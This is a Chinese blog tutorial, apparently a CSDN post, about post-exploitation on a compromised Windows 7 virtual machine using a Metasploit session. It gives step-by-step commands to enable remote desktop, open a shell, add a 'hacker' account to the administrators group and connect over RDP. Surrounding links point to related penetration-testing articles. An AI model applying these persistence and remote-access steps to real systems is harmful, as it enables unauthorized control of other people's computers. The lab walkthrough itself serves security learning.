网络安全工程师演示:黑客是如何进行Windows7计算机攻防实战?(实战篇)

最新推荐文章于 2024-04-08 23:15:15 发布
最新推荐文章于 2024-04-08 23:15:15 发布
阅读量614 收藏 5
点赞数
分类专栏: 科技 黑客 IT技术 文章标签: 网络安全 信息安全 计算机网络 linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xiao1234oaix/article/details/109689681
版权
黑客 同时被 3 个专栏收录
192 篇文章 32 订阅
订阅专栏
科技
187 篇文章 10 订阅
订阅专栏
IT技术
173 篇文章 4 订阅
订阅专栏

课前声明:
1、本分享仅做学习交流,请自觉遵守法律法规!
2、搜索:Kali 与编程,学习更多网络攻防干货!
3、Kali 与编程每天准时更新,敬请学习和关注!
正文部分
一、背景介绍
Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者主机呢?如何远程开启受害者主机的远程桌面连接服务呢?接下来让我们一起学习!
二、资源装备
1.成功拿下的 Win7虚拟机一台
2.整装待发的小白一个。
3.安装好的Kali Linux虚拟机一台。
三、战略安排
3.1 进入跟已经拿下的Windows7的会话控制界面,如下图所示。
在这里插入图片描述

3.2 执行脚本文件,在攻击者主机远程打开受害者主机的远程桌面服务,如下图所示。
命令:run getgui -e
在这里插入图片描述

3.3 在受害者主机查看上条命令的执行结果如何,如下图所示。
步骤:Windows/计算机/系统属性/高级系统设置/远程
如下图可见,成功通过远程命令打开了受害者主机的远程桌面服务。
在这里插入图片描述

3.4 查看受害者主机的IP地址,如下图所示。
命令:ipconfig(查看Windows主机的IP地址)
命令:ifconfig(查看linux主机的IP地址)
在这里插入图片描述

3.5 利用远程桌面工具连接受害者主机,如下图所示。
命令:rdesktop 受害者主机IP:3389
在这里插入图片描述

3.6 如下图所示,进入受害者主机的远程桌面登录界面,选择其他用户登录。
在这里插入图片描述

3.7 输入刚才创建的账户信息进行登录,如下图所示。
在这里插入图片描述

3.8 出现的错误信息处理,登录失败,如下图所示。
Ps:因为刚才创建的账户信息不属于管理员组,将账户加入管理员组即可解决该错误,请看下面的操作。
在这里插入图片描述

3.9 进入受害者Windows主机的dos界面,如下图所示。
命令:shell
在这里插入图片描述

3.10 将刚才新建的账户加入管理员组,如下图所示。
命令:net localgroup administrators 用户名 /add
例子:net localgroup administrators hacker /add
在这里插入图片描述

3.11 改变控制台乱码问题,如下图所示。
命令:chcp 65001
在这里插入图片描述

3.12 再次利用远程桌面登录工具登录即可(具体命令参见3.5)
在这里插入图片描述
在这里插入图片描述

3.13 如下图所示,远程连接受害者主机成功!
在这里插入图片描述
小编一个个字敲打创作,可辛苦了,问君可否关注一下我呢?你还可搜索:Kali与编程,学习更多黑客渗透技巧呢 !拒绝盗版,转载请声明来源:Kali与编程
点我学习完整视频渗透课,预计更新1000节

Kali与编程~
关注
  • 0
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
最全渗透测试实战-CS工具使用_kali如何用cs,重磅来袭
2401_84141304的博客
05-12 714
rwxrwxrwx 1 777 kali 791099 6月 9 2022 CSAgent.jar-rwxrwxrwx 1 777 kali 217 6月 9 2022 peclonedrwxrwxrwx 2 777 kali 4096 9月 10 09:51 resourcesdrwxrwxrwx 2 777 kali 4096 9月 10 09:51 scripts。
网络安全-实战篇 菜鸟如何反转到资深Web安全工程师
Coisini的博客
05-30 1383
00后理工男,计算机专业,毕业于985院校,从事Web安全工作,两年多的时间里先后跳槽3家公司,跳槽理由主要有以下几点:加班多、薪资低、工作内容枯燥,不想安于现状,寄希望于通过跳槽找到一个“钱多、活少、离家近”的工作。 可是,越跳越槽,一家不如一家。第一家单位是个知名互联网公司,同一批进入的应届生,现在有的人已经晋升到技术经理,薪水也翻了几倍。再看看当前的我,哎!只怪我当时太自负,那时每天做的都...
网络安全工程师演示黑客是如何进行Windows7计算机攻防实战?(准备篇)
Kali与编程
11-14 337
课前声明: 1、本分享仅做学习交流,请自觉遵守法律法规! 2、搜索:Kali 与编程,学习更多网络攻防干货! 3、Kali 与编程每天准时更新,敬请学习和关注! 正文部分 一、背景介绍 Metasploit就是一个漏洞框架。它的全称叫做The Metasploit Framework,简称叫做MSF。Metasploit作为全球最受欢迎的工具,不仅仅是因为它的方便性和强大性,更重要的是它的框架。它允许使用者开发自己的漏洞脚本,从而进行测试。Metasploit(msf)究竟威力如何呢?如何利用木马控制受害者
网络安全自学篇」黑客攻防实战编程看这篇就够了(内含实战
MachineGunJoe666
04-26 1606
长期以来,由于诸多方面的因素,“黑客”这个字眼变得十分敏感。不同的人群对黑客也存在不同的理解,甚至没有人愿意承认自己是黑客。有些人认为,黑客是一群狂热的技术爱好者,他们无限度地追求技术的完美:有些人认为,黑客只是一群拥有技术,但思想简单的毛头小伙子;还有些人认为黑客是不应该存在的,他们是网络的破坏者。这里,我们没有必要对这个问题争论不休,也无须为黑客加上一个标准的定义,但从客观存在的事实来看,黑客这类群体往往存在以下共同点。 (1)强烈的技术渴望与完美主义:驱动他们成长的是对技术的无限渴望,获得技术的提高
网络安全好学吗?手把手教你学 网络安全工程师学习资料汇总 渗透实战安全学习资料
qq_60864752的博客
12-24 641
网络安全(一) 了解什么是黑客
Nire_Yeyu的博客
11-16 3207
一、前言 首先声明一下,我今天开设“网络安全”这个模块,是希望带着大家多去了解网络方面的相关知识,从而为我的之后要讲的其他模块做好铺垫,而不是真的要教大家怎么去当一个黑客。就算我真的想教大家黑客技术,这样的知识也不可能过审啊。 我个人希望把这个模块打造得更加大众化,讲些大家听着觉得有趣,且大家都听得懂的东西,所以在这里我尽量不敲代码,如果大家对代码实现很感兴趣的话,可以关注一下我的其他专业版块,在...
黑客攻防技术宝典:Web实战篇(第2版)1
08-03
黑客攻防技术宝典:Web实战篇(第2版)》是一本专注于Web应用程序安全的实战指南,由Dafydd Stuttard和Marcus Pinto撰写,由石华耀和傅志红翻译。该书深入浅出地探讨了Web应用程序的安全风险和攻防策略,适合网络...
彻底研究:黑客编程技术揭秘与攻防实战
04-01
彻底研究:黑客编程技术揭秘与攻防实战
渗透实战(周一):VMmare Fusion安装Kali Linux和win7虚拟机
weixin_30287169的博客
11-12 459
高配笔记本电脑i5/8G/265G 、VMware Fusion 、Kali Linux镜像 、Win7镜像 第一:下载软件 1.如果你是苹果系统,建议下载最新VMware Fusion 11.0.0 中文版虚拟机 (点此下载),里面包含密钥,亲测有用。 另外,如果你是Win系统,建议下载WMware Workstation 15 pro 虚拟...
一次实战环境横向内网渗透记录
weixin_44284303的博客
07-08 1470
渗透背景: 某反病毒公司即将推出一种新的反病毒产品,已知该公司员工Molos的电脑中有该反病毒产品的相关信息,目标是将该文件取出并不被发现 已有条件: (1)你已经进入了内网中 (2)四个已知ip: 10.21.48.70 10.21.48.72 10.21.48.73 10.21.48.75 (3)攻击机kali:10.21.48.58 /内网渗透过程**/ 1.信息收集 通过nmap进行信息收...
一款超有趣的CMD代码雨
09-27
超级有趣的黑客帝国代码雨!很多人都觉得黑客帝国里,电脑屏幕上的绿色代码雨非常的炫酷。想要制作一个来炫耀一番。下面,小编来介绍制作方法。
安装mysql黑客_win7 32/64位安装MySQL详细步骤(图文)
weixin_39558317的博客
02-09 112
3.Multifunctional Database:通用多功能型Transactional Database Only:服务器类型,专注于事务处理Non-Transactional Database Only:非事务处理型,较简单,主要做一些监控、记数用,对MyISAM数据类型的支持仅 限于non-transactional这里选择Multifunctional Database就ok了,ne...
【Kali Linux】高级渗透测试实战篇
小洁洁
09-01 5500
>对于企业网络安全建设工作的质量保障,业界普遍遵循PDCA(计划(Plan)、实施(Do)、检查(Check)、处理(Act))的方法论。近年来,网络安全攻防对抗演练发挥了越来越重要的作用。企业的安全管理者通过组织内部或外部攻击队,站在恶意攻击者的视角,识别自身网络安全建设过程中的防护短板,检验安全应急预案的有效性并持续优化,为业务发展提供更强的保驾护航能力。
kali基础渗透学习,永恒之蓝,木马实战
最新发布
killsime的博客
04-08 1717
即 MetaSploit Framework,是一款开源安全漏洞利用和测试工具,集成了各种平台上常见的溢出漏洞和流行的shellcode,并持续保持更新。可以满足渗透测试的全过程metasploit让复杂的漏洞攻击流程变的非常简单,一个电脑小白经过几小时的学习,就能对操作系统等主流漏洞发起危害性攻击本质是利用别人开发好的工具,只能对一些老旧系统攻击如下,模拟使用msf利用永恒之蓝漏洞(因为可以导致蓝屏命名)在终端输入下面代码启动msfdb initmsfconsole可以db_status。
Kali实战-漏洞扫描
kaitoulee
05-24 4095
在主机发现、端口发现、服务扫描得到目标系统开放端口的服务、服务的的软件版本信息,继而可以在软件的官网上查看版本信息以及补丁列表,而高危漏洞则可以直接控制目标系统。 在此基础上对目标系统存在哪些漏洞弱点进行一个基本的判断,但是这样做会有很多弊端,扫描的很多端口上跑着各种各样的服务,你会忙于在各大网站上去查询官方文档,阅读大量的文章,导致你非常疲惫,这种思路成本比较高,速度比较慢。  我们
计算机安全模式快捷键,windows7怎么进入安全模式(快捷键进入的方法)
weixin_29485887的博客
07-21 5514
不得不说Windows安全模式是一个非常强大的功能,任何病毒都无法在安全模式下运行,是解决电脑系统故障非常不错的一个模式。但是随着WIN10的普及,传统的开机按F8已经无法进入安全模式了!不是WIN10取消了安全模式,而是换了方式。今天咱们就来看看电脑的WIN10系统下,有哪些方式可以进入安全模式。方法一:点击【开始】-【电源】,按住shift键同时点击【重启】,然后win10系统会自动进入【高级...
如何成为一名黑客网络安全从业者)——网络攻击技术篇(1/8 扫描技术)
热门推荐
Mr.Quark
09-14 1万+
大家好,我是Mr.Quark,又和大家见面了,今天我要和大家分享的是网络攻击技术八篇中的第一篇:扫描技术,在未来的几天里,将会陆续发布其余部分。希望大家在学习后仅在自己的操作系统或者虚拟机上实验,如果你想为别人的计算机做安全测试,请取得授权。喜欢本文的朋友,欢迎转载。下面进入正题。↓↓↓ 我们先模拟一个场景         有一个叫 老K 的黑帽黑客,他以非法进入其他公司的官方
CMD命令大全
qq_28758893的博客
10-12 1845
CMD命令:开始->运行->键入cmd或command(在命令行里可以看到系统版本、文件系统版本) chcp 修改默认字符集 chcp 936默认中文 chcp 65001 appwiz.cpl:程序和功能 calc:启动计算器 chkdsk.exe:Chkdsk磁盘检查(管理员身份运行命令提示符) cleanmgr: 打开磁盘清理工具 cmd.exe:CMD命令提示符 自动关机命令   Shutdown -s -t 600:表示600秒后自动关机   shutdown
kali使用msf 通过ms17_010_eternalblue(永恒之蓝)漏洞攻击win7测试 及乱码问题解决
请大家直接把问题写在评论区或留言,不要只说一句"你好 或 在吗",我会尽快回复的。
08-26 3120
两台Vmware虚拟机: Kali Win7 64位: (主机)kali的ip是 192.168.0.119 (靶机)win7的ip是192.168.0.109 使用nmap端口扫描工具,扫描一下目标靶机;如下图,可以发现:目标win7系统的445端口开启,可以使用永恒之蓝漏洞攻击 Kali终端输入msfconsole,启动msfconsole;如下图,启动画面每次都不一样 图...
Web应用程序安全实战黑客攻防技术解析
"《黑客攻防技术宝典:Web实战篇》是一本深入探讨Web应用程序安全的实战指南,由安全技术专家Dafydd Stuttard和Miroslav Pinto合著。本书旨在帮助读者理解和应对Web应用程序中的安全风险,提供渗透测试的详细步骤和...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Kali与编程~

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值